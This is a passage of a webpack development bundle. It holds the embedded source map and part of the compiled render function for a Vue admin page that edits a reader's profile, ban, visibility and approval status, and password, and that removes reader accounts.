sourceMappingURL=data:application/json;charset=utf-8;base64,{"version":3,"sources":["webpack:///resources/js/pages/admin/reader/reader-form.vue?c840"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAkQA;AACA;AACA;AACA;AACA;AACA;AAEA;AACA,oBADA;AAGA,UAHA,sBAGA;AACA;AAAA;AAAA;AACA,GALA;AAOA;AACA,4EADA;AAEA;AAFA,GAPA;AAYA;AAAA;AACA,uBADA;AAEA,iCAFA;AAGA,wBAHA;AAIA,yBAJA;AAKA,0BALA;AAMA,gBACA;AACA,aADA;AAEA;AAFA,OADA,EAKA;AACA,aADA;AAEA;AAFA,OALA,EASA;AACA,aADA;AAEA;AAFA,OATA;AANA;AAAA,GAZA;AAkCA;AACA,qBADA;AAEA,yCAFA;AAGA,iDAHA;AAIA,uCAJA;AAKA;AALA,IAlCA;AA0CA,aA1CA,yBA0CA;AAAA;;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,KANA;AAOA;AACA;AACA,KAFA;AAGA,GAtDA;AAwDA;AACA,UADA,oBACA;AAAA;;AAAA;AAAA;AAAA;AAAA;AAAA;AACA;AACA,wCADA;AAEA,6DAFA;AAGA,iCAHA;AAIA,wCAJA;AAKA,+CALA;AAMA,2CANA;AAOA;AAPA,mBAQA,IARA,CAQA;AACA;;AACA;AACA;AACA,gFACA,gCADA,KAEA,2DACA;AAGA;AACA,iFACA,8BADA,KAEA,8DACA;AAEA,oFACA,2CADA,KAEA,+DACA;;AAEA;AAAA;AAAA;;AACA;AACA;AACA;AACA,yBAFA;AAGA;AACA,qBANA;AAOA;AACA,iBArCA;;AADA;AAAA;AAAA;AAAA;AAAA;AAAA;AAAA;AAuCA,KAxCA;AA0CA,gBA1CA,0BA0CA;AAAA;;AACA;AACA;AACA,OAFA;AAGA;AACA,KA/CA;AAiDA,iBAjDA,2BAiDA;AAAA;;AACA;AACA,8BADA;AAEA,iDAFA;AAGA,uBAHA;AAIA,8BAJA;AAKA,qCALA;AAMA,iCANA;AAOA;AAPA,SAQA,IARA,CAQA;AACA;;AACA;AACA;AAAA;AAAA;;AACA;AACA;AACA;AAAA;AAAA;AACA,eAFA;AAGA;AACA,WANA;AAOA;AACA,OAnBA;AAoBA,KAtEA;AAwEA,UAxEA,oBAwEA;AACA;AACA;AA1EA;AAxDA","file":"./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&.js","sourcesContent":["<template>\r\n  <card class=\"py-3 m-4\">\r\n    <div class=\"row\">\r\n      <div class=\"col-md-8\">\r\n        <h4 class=\"mb-3\">Update Reader Profile</h4>\r\n        <p 
class=\"mb-5\">Change personal information here.</p>\r\n      </div>\r\n      <div class=\"col-md-4 text-right\">\r\n        <button class=\"btn btn-danger btn-lg\" @click=\"goBack\">Back</button>\r\n      </div>\r\n    </div>\r\n    <hr>\r\n    \r\n    <h5 class=\"mb-3\">Account Information</h5>\r\n    <form @submit.prevent=\"update\" @keydown=\"readerForm.onKeydown($event)\">\r\n      <div class=\"row\">\r\n        <div class=\"col-md-6\">\r\n          <!-- Username -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('username') }}</label>\r\n            <input  v-model=\"readerForm.username\" :class=\"{ 'is-invalid': readerForm.errors.has('username') }\" class=\"form-control\" type=\"text\" name=\"username\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"username\" />\r\n          </div>\r\n\r\n          <!-- First Name -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('First Name') }}</label>\r\n            <input  v-model=\"readerForm.firstName\" :class=\"{ 'is-invalid': readerForm.errors.has('firstName') }\" class=\"form-control\" type=\"text\" name=\"firstName\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"firstName\" />\r\n          </div>\r\n\r\n          <!-- Last Name -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Last Name') }}</label>\r\n            <input  v-model=\"readerForm.lastName\" :class=\"{ 'is-invalid': readerForm.errors.has('lastName') }\" class=\"form-control\" type=\"text\" name=\"lastName\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"lastName\" />\r\n          </div>\r\n\r\n        </div>\r\n        \r\n        <div class=\"col-md-6\">\r\n      \r\n          <!-- Email -->\r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>{{ $t('email') }}</label>\r\n  
          <input  v-model=\"readerForm.email\" :class=\"{ 'is-invalid': readerForm.errors.has('email') }\" class=\"form-control\" type=\"text\" name=\"email\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"email\" />\r\n          </div>\r\n\r\n          <!-- Phone Number -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Phone Number') }}</label>\r\n            <input  v-model=\"readerForm.phone_number\" :class=\"{ 'is-invalid': readerForm.errors.has('phone_number') }\" class=\"form-control\" type=\"text\" name=\"phone_number\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"phone_number\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto ml-2\">\r\n            <label>Banned?</label>\r\n            <InputSwitch v-model=\"sync_banned\" class=\"mr-2\" :disabled=\"!isUpdating\" />\r\n      \r\n            <label>Visible?</label>\r\n            <InputSwitch v-model=\"sync_visible\" class=\"mr-2\" :disabled=\"!isUpdating\" />\r\n    \r\n            <label>Approved?</label>\r\n            <InputSwitch v-model=\"sync_approved\"  class=\"mr-2\" :disabled=\"!isUpdating\" />\r\n          </div>\r\n\r\n        </div>\r\n\r\n        <!-- Submit Button -->\r\n        <div class=\"form-group row  col-md-4 mx-auto mt-3\">\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-if=\"isUpdating\">\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-else>\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-danger w-100\" @click.prevent=\"removeAccount()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            
Remove Account\r\n            </button>\r\n          </div>\r\n          \r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <!-- Update Button -->\r\n            <button class=\"btn btn-primary w-100\" @click.prevent=\"isUpdating = true\"  v-if=\"!isUpdating\">\r\n              {{ $t('update') }}\r\n            </button>\r\n            <v-button class=\"btn btn-primary w-100\"  v-else>\r\n              Confirm\r\n            </v-button>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </form>\r\n\r\n    <hr class=\" mt-5\">\r\n    <h5 class=\"mb-3\">Additional Information</h5>\r\n    <form @submit.prevent=\"updateAdditional\" @keydown=\"additionalForm.onKeydown($event)\">\r\n      <div class=\"row\">\r\n        <div class=\"col-md-6\">   \r\n          \r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>{{ $t('Address') }}</label>\r\n            <input  v-model=\"additionalForm.address\" :class=\"{ 'is-invalid': additionalForm.errors.has('address') }\" class=\"form-control\" type=\"text\" name=\"address\" :readonly=\"!isAdditionalUpdating\">\r\n            <has-error :form=\"additionalForm\" field=\"address1\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('State/Province') }}</label>\r\n            <input  v-model=\"additionalForm.state\" :class=\"{ 'is-invalid': additionalForm.errors.has('state') }\" class=\"form-control\" type=\"text\" name=\"state\" :readonly=\"!isAdditionalUpdating\">\r\n            <has-error :form=\"additionalForm\" field=\"state\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('ZIP/Postal Code') }}</label>\r\n            <input  v-model=\"additionalForm.zip\" :class=\"{ 'is-invalid': additionalForm.errors.has('zip') }\" class=\"form-control\" type=\"text\" name=\"zip\" :readonly=\"!isAdditionalUpdating\">\r\n            
<has-error :form=\"additionalForm\" field=\"zip\" />\r\n          </div>\r\n\r\n        </div>\r\n        \r\n        <div class=\"col-md-6\">\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Country') }}</label>\r\n            <input  v-model=\"additionalForm.country\" :class=\"{ 'is-invalid': additionalForm.errors.has('country') }\" class=\"form-control\" type=\"text\" name=\"country\" :readonly=\"!isAdditionalUpdating\">\r\n            <has-error :form=\"additionalForm\" field=\"country\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>{{ $t('Birthdate') }}</label>\r\n            <birth-datepicker  v-model=\"additionalForm.birthdate\" :class=\"{ 'is-invalid': additionalForm.errors.has('birthdate') }\" class=\"form-control\" name=\"birthdate\" :disabled=\"!isAdditionalUpdating\" />\r\n            <has-error :form=\"additionalform\" field=\"birthdate\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>Gender</label>\r\n            <select id=\"gender\" class=\"form-control\"  v-model=\"additionalForm.gender\" required :disabled=\"!isAdditionalUpdating\">\r\n              <option :value=\"gender.id\"\r\n                v-for=\"(gender) in genders\"\r\n                :key=\"gender.id\">\r\n                {{ gender.name }}\r\n              </option>\r\n            </select>\r\n            <has-error :form=\"additionalForm\" field=\"gender\" />\r\n          </div>     \r\n        \r\n        </div>\r\n\r\n        <!-- Submit Button -->\r\n        <div class=\"form-group row  col-md-4 mx-auto mt-3\" v-if=\"isAdditionalUpdating\">\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  >\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            
Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <v-button class=\"btn btn-primary w-100\" >\r\n              Confirm\r\n            </v-button>\r\n          </div>\r\n        </div>\r\n        \r\n        <div class=\"form-group row  col-md-4 mx-auto mt-3\"  v-else>\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  >\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <v-button class=\"btn btn-primary w-100\" >\r\n              Confirm\r\n            </v-button>\r\n          </div>\r\n        </div>\r\n\r\n      </div>\r\n    </form>\r\n\r\n    <hr class=\" mt-5\">\r\n    <h5 class=\"mb-3\">Update Password</h5>\r\n    <form @submit.prevent=\"update\" @keydown=\"readerForm.onKeydown($event)\">\r\n      <div class=\"row\">\r\n        <div class=\"col-md-6\">   \r\n          \r\n          <!-- Password -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('password') }}</label>\r\n            <input  v-model=\"readerForm.password\" :class=\"{ 'is-invalid': readerForm.errors.has('password') }\" class=\"form-control\" type=\"password\" name=\"password\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"password\" />\r\n          </div>\r\n\r\n          <!-- Confirm Password -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Confirm Password') }}</label>\r\n            <input :class=\"{ 'is-invalid': readerForm.errors.has('confirm-password') }\" class=\"form-control\" type=\"password\" name=\"confirmPassword\" :readonly=\"!isUpdating\">\r\n            <has-error 
:form=\"readerForm\" field=\"confirmPassword\" />\r\n          </div>\r\n\r\n        </div>\r\n        \r\n        <div class=\"col-md-6\">\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Current Password') }}</label>\r\n            <input :class=\"{ 'is-invalid': readerForm.errors.has('current-password') }\" class=\"form-control\" type=\"password\" name=\"currentPassword\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"currentPassword\" />\r\n          </div>\r\n        \r\n        </div>\r\n\r\n        <!-- Submit Button -->\r\n        <div class=\"form-group row col-md-4 mx-auto mt-3\">\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-if=\"isUpdating\">\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-else>\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-danger w-100\" @click.prevent=\"removeAccount()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Remove Account\r\n            </button>\r\n          </div>\r\n          \r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <!-- Update Button -->\r\n            <button class=\"btn btn-primary w-100\" @click.prevent=\"isUpdating = true\"  v-if=\"!isUpdating\">\r\n            {{ $t('update') }}\r\n            </button>\r\n            <v-button class=\"btn btn-primary w-100\"  v-else>\r\n            Confirm\r\n            </v-button>\r\n          </div>\r\n\r\n        </div>\r\n      </div>\r\n    </form>\r\n\r\n  </card>\r\n</template>\r\n\r\n<script>\r\nimport Form from 'vform'\r\nimport { mapGetters } from 'vuex'\r\nimport { swalOops, swalSuccess } from 
\"~/helpers\"\r\nimport Swal from 'sweetalert2';\r\nimport InputSwitch from 'primevue/inputswitch';\r\nimport birthDatepicker from 'vue-birth-datepicker/src/birth-datepicker';\r\n\r\nexport default {\r\n  scrollToTop: false,\r\n\r\n  metaInfo () {\r\n    return { title: this.$t('settings') }\r\n  },\r\n\r\n  components: {\r\n    InputSwitch,\r\n    birthDatepicker\r\n  },\r\n\r\n  data: () => ({\r\n    isUpdating: false,\r\n    isAdditionalUpdating: false,\r\n    sync_banned: false,\r\n    sync_visible: false,\r\n    sync_approved: false,\r\n    genders: [\r\n      {\r\n        id: 0,\r\n        name: 'Male'\r\n      },\r\n      {\r\n        id: 1,\r\n        name: 'Female'\r\n      },\r\n      {\r\n        id: 2,\r\n        name: 'Other'\r\n      }\r\n    ]\r\n  }),\r\n\r\n  computed: mapGetters({\r\n    user: 'auth/user',\r\n    readerForm: 'admin-reader/readerForm',\r\n    additionalForm: 'admin-reader/additionalForm',\r\n    is_banned: 'admin-reader/is_banned',\r\n    visible: 'admin-reader/visible',\r\n  }),\r\n\r\n  beforeMount () {\r\n    let id = this.$route.params.id\r\n    this.$store.dispatch(\"admin-reader/viewReader\", id).then(()=>{\r\n      console.log(this.readerForm.is_banned)\r\n      this.sync_banned = this.readerForm.is_banned === 1 ? true : false\r\n      console.log(this.sync_banned)\r\n      this.sync_visible = this.readerForm.visible === 1 ? true : false\r\n      this.sync_approved = this.readerForm.is_approved === \"APPROVED\" ? 
true : false\r\n    });\r\n    this.$store.dispatch(\"admin-reader/viewAdditional\", id).then(()=>{\r\n      console.log(this.additionalForm);\r\n    });\r\n  },\r\n\r\n  methods: {\r\n    async update () {\r\n      Swal.fire({\r\n        title: 'Are you sure?',\r\n        text: \"You are about to update this reader\",\r\n        icon: 'warning',\r\n        showCancelButton: true,\r\n        confirmButtonColor: '#3085d6',\r\n        cancelButtonColor: '#d33',\r\n        confirmButtonText: 'Confirm'\r\n      }).then((result) => {\r\n        console.log(result.value);\r\n        if (result.value) {\r\n          console.log(this.sync_banned);\r\n          if (this.sync_banned == 0 || this.sync_banned == false)\r\n            this.readerForm.is_banned = 0;\r\n          else if (this.sync_banned == 1 || this.sync_banned == true)\r\n            this.readerForm.is_banned = 1;\r\n          \r\n\r\n          console.log(this.visible);\r\n          if (this.sync_visible == 1 || this.sync_visible == true)\r\n            this.readerForm.visible = 1;\r\n          else if (this.sync_visible == 0 || this.sync_visible == false)\r\n            this.visible = 0;\r\n          \r\n          if (this.sync_approved == 0 || this.sync_approved == false)\r\n            this.readerForm.is_approved = \"REJECTED\";\r\n          else if (this.sync_approved == 1 || this.sync_approved == true)\r\n            this.readerForm.is_approved = \"APPROVED\";\r\n          \r\n          this.$store.dispatch('admin-reader/editReader', this.readerForm).then(({success, message}) => {\r\n          if (success) {\r\n            swalSuccess(\"Reader Updated\").then(() =>{\r\n               this.isUpdating = false;\r\n            })\r\n          }\r\n        })\r\n        }\r\n      })\r\n    },\r\n\r\n    cancelUpdate() {\r\n      this.readerForm.keys().forEach(key => {\r\n        this.readerForm[key] = this.user[key]\r\n      })\r\n      this.isUpdating = false;\r\n    },\r\n\r\n    removeAccount(){\r\n      
Swal.fire({\r\n        title: 'Are you sure?',\r\n        text: \"You won't be able to revert this!\",\r\n        icon: 'warning',\r\n        showCancelButton: true,\r\n        confirmButtonColor: '#3085d6',\r\n        cancelButtonColor: '#d33',\r\n        confirmButtonText: 'Yes, delete it!'\r\n      }).then((result) => {\r\n        console.log(result);\r\n        if (result.value) {\r\n          this.$store.dispatch('admin-reader/removeReader', this.readerForm.id).then(({success, message}) => {\r\n          if (success) {\r\n            swalSuccess(\"Reader removed!\").then(() =>{\r\n              this.$router.push({ name: 'admin.readers' })\r\n            })\r\n          }\r\n        })\r\n        }\r\n      })\r\n    },   \r\n\r\n    goBack(){\r\n      this.$router.back()\r\n    }\r\n  }\r\n}\r\n</script>\r\n"],"sourceRoot":""}\n//# sourceURL=webpack-internal:///./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\n");
/***/ }),
/***/ "./node_modules/vue-loader/lib/loaders/templateLoader.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&":
/*!**********************************************************************************************************************************************************************************************************************!*\
!*** ./node_modules/vue-loader/lib/loaders/templateLoader.js??vue-loader-options!./node_modules/vue-loader/lib??vue-loader-options!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b& ***!
\**********************************************************************************************************************************************************************************************************************/
/*! exports provided: render, staticRenderFns */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"render\", function() { return render; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"staticRenderFns\", function() { return staticRenderFns; });\nvar render = function() {\n var _vm = this\n var _h = _vm.$createElement\n var _c = _vm._self._c || _h\n return _c(\"card\", { staticClass: \"py-3 m-4\" }, [\n _c(\"div\", { staticClass: \"row\" }, [\n _c(\"div\", { staticClass: \"col-md-8\" }, [\n _c(\"h4\", { staticClass: \"mb-3\" }, [_vm._v(\"Update Reader Profile\")]),\n _vm._v(\" \"),\n _c(\"p\", { staticClass: \"mb-5\" }, [\n _vm._v(\"Change personal information here.\")\n ])\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"col-md-4 text-right\" }, [\n _c(\n \"button\",\n { staticClass: \"btn btn-danger btn-lg\", on: { click: _vm.goBack } },\n [_vm._v(\"Back\")]\n )\n ])\n ]),\n _vm._v(\" \"),\n _c(\"hr\"),\n _vm._v(\" \"),\n _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Account Information\")]),\n _vm._v(\" \"),\n _c(\n \"form\",\n {\n on: {\n submit: function($event) {\n $event.preventDefault()\n return _vm.update($event)\n },\n keydown: function($event) {\n return _vm.readerForm.onKeydown($event)\n }\n }\n },\n [\n _c(\"div\", { staticClass: \"row\" }, [\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"username\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.username,\n expression: \"readerForm.username\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"username\")\n },\n attrs: {\n type: \"text\",\n name: \"username\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.username },\n on: {\n input: function($event) {\n if 
($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"username\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"username\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"First Name\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.firstName,\n expression: \"readerForm.firstName\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"firstName\")\n },\n attrs: {\n type: \"text\",\n name: \"firstName\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.firstName },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"firstName\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"firstName\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Last Name\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.lastName,\n expression: \"readerForm.lastName\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"lastName\")\n },\n attrs: {\n type: \"text\",\n name: \"lastName\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.lastName },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"lastName\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"lastName\" }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"col-md-6\" }, 
[\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto\" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"email\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.email,\n expression: \"readerForm.email\"\n }\n ],\n staticClass: \"form-control\",\n class: { \"is-invalid\": _vm.readerForm.errors.has(\"email\") },\n attrs: {\n type: \"text\",\n name: \"email\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.email },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"email\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"email\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Phone Number\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.phone_number,\n expression: \"readerForm.phone_number\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"phone_number\")\n },\n attrs: {\n type: \"text\",\n name: \"phone_number\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.phone_number },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(\n _vm.readerForm,\n \"phone_number\",\n $event.target.value\n )\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"phone_number\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto ml-2\" },\n [\n _c(\"label\", [_vm._v(\"Banned?\")]),\n _vm._v(\" \"),\n _c(\"InputSwitch\", {\n staticClass: \"mr-2\",\n attrs: { disabled: !_vm.isUpdating },\n model: {\n value: _vm.sync_banned,\n callback: function($$v) {\n 
_vm.sync_banned = $$v\n },\n expression: \"sync_banned\"\n }\n }),\n _vm._v(\" \"),\n _c(\"label\", [_vm._v(\"Visible?\")]),\n _vm._v(\" \"),\n _c(\"InputSwitch\", {\n staticClass: \"mr-2\",\n attrs: { disabled: !_vm.isUpdating },\n model: {\n value: _vm.sync_visible,\n callback: function($$v) {\n _vm.sync_visible = $$v\n },\n expression: \"sync_visible\"\n }\n }),\n _vm._v(\" \"),\n _c(\"label\", [_vm._v(\"Approved?\")]),\n _vm._v(\" \"),\n _c(\"InputSwitch\", {\n staticClass: \"mr-2\",\n attrs: { disabled: !_vm.isUpdating },\n model: {\n value: _vm.sync_approved,\n callback: function($$v) {\n _vm.sync_approved = $$v\n },\n expression: \"sync_approved\"\n }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"form-group row col-md-4 mx-auto mt-3\" }, [\n _vm.isUpdating\n ? _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-secondary w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.cancelUpdate()\n }\n }\n },\n [_vm._v(\"\\n Cancel\\n \")]\n )\n ])\n : _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-danger w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.removeAccount()\n }\n }\n },\n [_vm._v(\"\\n Remove Account\\n \")]\n )\n ]),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n [\n !_vm.isUpdating\n ? 
_c(\n \"button\",\n {\n staticClass: \"btn btn-primary w-100\",\n on: {\n click: function($event) {\n $event.preventDefault()\n _vm.isUpdating = true\n }\n }\n },\n [\n _vm._v(\n \"\\n \" +\n _vm._s(_vm.$t(\"update\")) +\n \"\\n \"\n )\n ]\n )\n : _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n _vm._v(\"\\n Confirm\\n \")\n ])\n ],\n 1\n )\n ])\n ])\n ]\n ),\n _vm._v(\" \"),\n _c(\"hr\", { staticClass: \" mt-5\" }),\n _vm._v(\" \"),\n _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Additional Information\")]),\n _vm._v(\" \"),\n _c(\n \"form\",\n {\n on: {\n submit: function($event) {\n $event.preventDefault()\n return _vm.updateAdditional($event)\n },\n keydown: function($event) {\n return _vm.additionalForm.onKeydown($event)\n }\n }\n },\n [\n _c(\"div\", { staticClass: \"row\" }, [\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto\" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Address\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.additionalForm.address,\n expression: \"additionalForm.address\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.additionalForm.errors.has(\"address\")\n },\n attrs: {\n type: \"text\",\n name: \"address\",\n readonly: !_vm.isAdditionalUpdating\n },\n domProps: { value: _vm.additionalForm.address },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(\n _vm.additionalForm,\n \"address\",\n $event.target.value\n )\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.additionalForm, field: \"address1\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"State/Province\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: 
